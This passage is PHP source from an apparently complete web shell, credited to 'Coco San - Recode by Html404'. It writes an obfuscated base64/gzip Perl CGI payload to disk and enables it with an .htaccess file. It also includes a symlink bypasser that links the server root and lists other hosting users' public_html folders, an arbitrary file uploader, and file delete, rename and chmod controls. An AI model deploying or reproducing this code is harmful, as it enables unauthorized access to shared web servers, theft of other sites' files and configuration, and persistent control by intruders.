1464if(isset($_POST['perl']))
1465{
1466 error_reporting(0);
1467
1468$da='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';
1469$decryp=gzinflate(base64_decode($da));
1470mkdir('perl', 0777);
1471$hope = fopen("perl/.htaccess", 'w');
1472$hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
1473fwrite ( $hope, $hcon ) ;
1474$pelfile = fopen("perl/in.root" ,"w");
1475fwrite ($pelfile,$decryp);
1476 chmod("perl/in.root",0755);
1477 echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
1478 echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>Open Configuration File</u></a></font>";
1479
1480}
1481?>
1482<form method=post>
1483<font color=white size=2>Symlink bypasser ( Use this tools if Cant read /etc/named ) </font><p>
1484<input type=submit name="ms" value="Let's play with us " /></form>
1485<?php
1486 if(isset($_POST['ms']))
1487 {
1488 error_reporting(0);
1489 $cmd="ls /var/named";
1490 $r=shell_exec($cmd);
1491
1492
1493 mkdir('SymSec',0777);
1494
1495
1496
1497
1498$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1499$f = fopen('SymSec/.htaccess','w');
1500
1501$security = symlink("/","SymSec/root");
1502
1503fwrite($f , $rr);
1504 ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="Start the game " />
1505</form>
1506<?php
1507
1508 }
1509
1510error_reporting(0);
1511$webs=explode("\n",$_POST['web']);
1512if(isset($_POST['w']))
1513{
1514$webs=explode("\n",$_POST['web']);
1515echo "<table width=40% align=center border=1>
1516<tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
1517foreach($webs as $f)
1518{
1519 $str=substr_replace($f,"",-4);
1520
1521
1522$user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
1523
1524echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=SymSec/root/home/".$user['name']."/public_html/>Open the Symlink file</a></tr></table>"; flush();
1525
1526
1527
1528
1529
1530 }
1531
1532 }
1533
1534
1535?>
1536<?php
1537echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
1538echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
1539if( $_POST['_upl'] == "Upload" ) {
1540if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success nyann ^_^ <b><br><br>'; }
1541else { echo '<b>Upload Failed nyan :"( </b><br><br>'; }
1542}
1543?>
1544<?php
1545//Make directory stuff
1546if (isset($_POST['do_create_dir'])) {
1547 $cdir = $_POST['create_dir'];
1548 if (is_dir($cdir)) {
1549 success("dir_exists", $cdir);
1550 } else {
1551 if (mkdir($cdir, 0777)) {
1552 success("createdir", $cdir);
1553 } else {
1554 error("Directory was not created!");
1555 }
1556 }
1557}
1558//Make file stuff
1559if (isset($_POST['do_create_file'])) {
1560 $cfile = $_POST['create_file'];
1561 if (file_exists($cfile)) {
1562 success("file_exists", $cfile);
1563 } else {
1564 if (fopen($cfile, "w+")) {
1565 success("file_created", $cfile);
1566 } else {
1567 error("File was not created");
1568 }
1569 }
1570}
1571//Go directory
1572if (isset($_POST['do_go_dir'])) {
1573 $godir = $_POST['go_dir'];
1574 echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
1575}
1576//Go Edit file
1577if (isset($_POST['do_go_edit'])) {
1578 $gefile = $_POST['go_edit_file'];
1579 if (file_exists($gefile)) {
1580 header("Location: http://$domain$script?editfile=$gefile");
1581 } else {
1582 error("File does not exist!");
1583 }
1584}
1585//Upload File
1586if (isset($_POST['do_upload_file'])) {
1587 $udir = $_POST['upload_location'];
1588 $uname = $_FILES['upload_file']['name'];
1589 $both = "$udir$uname";
1590 if (file_exists($both)) {
1591 success("file_exists", $both);
1592 } else {
1593 switch ($_FILES['upload_file']['error']) {
1594 case 0:
1595 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
1596 success("file_uploaded");
1597 } else {
1598 error("Failed To Upload File!");
1599 }
1600 }
1601 }
1602}
1603//Kill Shell
1604if (isset($_GET['kill'])) {
1605 if (unlink("$dir/$script2")) {
1606 success("shell_killed");
1607 } else {
1608 error("Failed to kill shell!");
1609 }
1610}
1611//Delete Directory
1612if (isset($_GET['deldir'])) {
1613 $deldir = $_GET['deldir'];
1614 $redir = dirname($deldir);
1615 if (rmdir($deldir)) {
1616 success("dir_del", rtrim($redir, '/'));
1617 } else {
1618 error("Failed to delete directory!");
1619 }
1620}
1621//Rename Directory
1622if (isset($_GET['rendir'])) {
1623 $rendir = $_GET['rendir'];
1624 $dend = $_GET['old'];
1625 echo "<center>
1626<form action='' method='post'>
1627<input type='text' class='text' name='new_dir_name' value='$dend'>
1628<input type='submit' name='do_rename_dir' value='Rename'>
1629</center>";
1630}
1631if (isset($_POST['do_rename_dir'])) {
1632 $newdir = $_POST['new_dir_name'];
1633 $rendir = $_GET['rendir'];
1634 $dend = $_GET['old'];
1635 if (rename("$rendir/$dend", "$rendir/$newdir")) {
1636 success("dir_renamed", $rendir);
1637 } else {
1638 error("Directory was not renamed!");
1639 }
1640}
1641//Delete file
1642if (isset($_GET['delfile'])) {
1643 $delfile = $_GET['delfile'];
1644 $redir = dirname($delfile);
1645 if (unlink($delfile)) {
1646 success("filedelete", rtrim($redir, '/'));
1647 } else {
1648 error("Failed to delete file!");
1649 }
1650}
1651//Rename File
1652if (isset($_GET['renfile'])) {
1653 $renfile = $_GET['renfile'];
1654 $fend = $_GET['old'];
1655 echo "<center>
1656<form action='' method='post'>
1657<input type='text' class='text' name='new_file_name' value='$fend'>
1658<input type='submit' name='do_rename_file' value='Rename'>
1659</center>";
1660}
1661if (isset($_POST['do_rename_file'])) {
1662 $newfile = $_POST['new_file_name'];
1663 $renfile = $_GET['renfile'];
1664 $fend = $_GET['old'];
1665 if (rename("$renfile/$fend", "$renfile/$newfile")) {
1666 success("file_renamed", $renfile);
1667 } else {
1668 error("File was not renamed!");
1669 }
1670}
1671//Mass Files Stuff
1672if (isset($_POST['mass_files'])) {
1673 $action = $_POST['mass_action'];
1674 $chmodvalue = $_POST['chmod_value'];
1675 $box = $_POST['delbox'];
1676 if ($action == "Delete") {
1677 foreach ($box as $b) {
1678 if (is_dir($b)) {
1679 if (rmdir($b)) {
1680 echo "<font color='green'>Deleted Directory: $b</font><br>";
1681 } else {
1682 echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
1683 }
1684 } else {
1685 if (unlink($b)) {
1686 echo "<font color='green'>Deleted File: $b</font><br>";
1687 } else {
1688 echo "<font color='red'>Failed To Delete file: $b</font><br>";
1689 }
1690 }
1691 }
1692 }
1693 if ($action == "chmod") {
1694 foreach ($box as $b) {
1695 if (is_dir($b)) {
1696 if (chmod($b, $chmodvalue)) {
1697 echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
1698 } else {
1699 echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
1700 }
1701 } else {
1702 if (chmod($b, $chmodvalue)) {
1703 echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
1704 } else {
1705 echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
1706 }
1707 }
1708 }
1709 }
1710}
1711?>
1712<footer>
1713<p>Copyright © 2017- <a href="">Coco San - Recode by : Html404</a></p>
1714<footer>
1715</footer>
1716</body>
1717</html>